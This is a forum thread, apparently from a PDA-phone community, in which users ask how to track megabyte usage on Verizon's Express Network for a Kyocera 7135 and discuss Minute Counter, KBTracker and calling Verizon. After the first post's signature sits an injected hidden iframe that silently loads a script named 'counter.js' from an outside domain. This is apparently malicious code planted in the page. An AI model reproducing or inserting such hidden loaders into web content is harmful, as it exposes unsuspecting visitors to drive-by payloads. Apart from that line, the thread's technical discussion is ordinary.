+ Reply to Thread

Megabyte Counting on Verizon's Express Networkprogram

Is anyone aware of a "Megabyte Counter" program or something that can keep track of megs used on Verizon's Express Network-- kind of like Rick Whitt's terrific "Minute Counter" does for plan minutes?

It can get real expensive if you go over your megabyte allotment.

Thanks,
    Mark<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I would like this too. A packet counter or something. I don't know of any way to determine how many K I've used until my bill comes. I won't get my first bill until later this month, I've used the phone a LOT and I'm kind of concerned about this.

I'm currently trying out Express Network (EN) using megabytes, and trying to decide whether to go with megabyte or minute pricing (assuming I stay with EN). I've noticed that minute counter "counts" data minutes when using a qnc connection, but does NOT count minutes when connecting by EN (even though both use #777 to connect). Does the software somehow "know" that the EN plan is by megabytes right now? I'd also like to know if there is any software to "count" megabytes (don't think there is), but I'd also like to know if switching EN to a minute plan, will Minute Counter "see" those minutes...

Originally posted by pdadoc
    I'm currently trying out Express Network (EN) using megabytes, and trying to decide whether to go with megabyte or minute pricing (assuming I stay with EN). I've noticed that minute counter "counts" data minutes when using a qnc connection, but does NOT count minutes when connecting by EN (even though both use #777 to connect). Does the software somehow "know" that the EN plan is by megabytes right now? I'd also like to know if there is any software to "count" megabytes (don't think there is), but I'd also like to know if switching EN to a minute plan, will Minute Counter "see" those minutes...
    Minute counter will not count EN minutes, ewven if you switch to a minute plan. packet data is not counted in the call history database.

You might want to call VZW and see if they have any way to check megabytes before you bill comes out. They do have a way to check your voice minutes (Use to be by dialing *MIN, but I think they changed it recently...).

Alan

PDAapps (http://www.pdaapps.com/treo.html) makes a data counter for the treo called "KBTracker", but i don't know if it would work for the 7135. They may be able to modify it to work for it though.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

You might want to call VZW and see if they have any way to check megabytes before you bill comes out. They do have a way to check your voice minutes (Use to be by dialing *MIN, but I think they changed it recently...).
    Alan [/B]
    I spoke to VZ customer support and the VZ data services cs agent as well. Both said they are not aware of any way to check megabyte usage before the bill comes out. (Even they couldn't tell me how much data I've used.) This is a major drawback to the megabyte plan that hopefully gets addressed somehow...

Mark

Tracking Express Network Use

I just want to confirm I've got this right. If using Express Network by megabytes, there is no way to keep track of that usage (the one app out there to track mb usage for the treo froze my 7135), and if using EN by minutes, the minutes don't show up in the Call History, and therefore cannot be tracked by Minute Counter or Cell Plan. Any other way to do this other than hoping for the best at the end of the month?....

Yeah, this is kind of a problem....

I agree, this is a problem and I haven't seen any solution yet. I'm not sure why Kyo didn't modify the call history software to track digital connection time or MB usage or both. Seems like a serious oversigth to me.

John
    John

For more information see barJohn Reviews It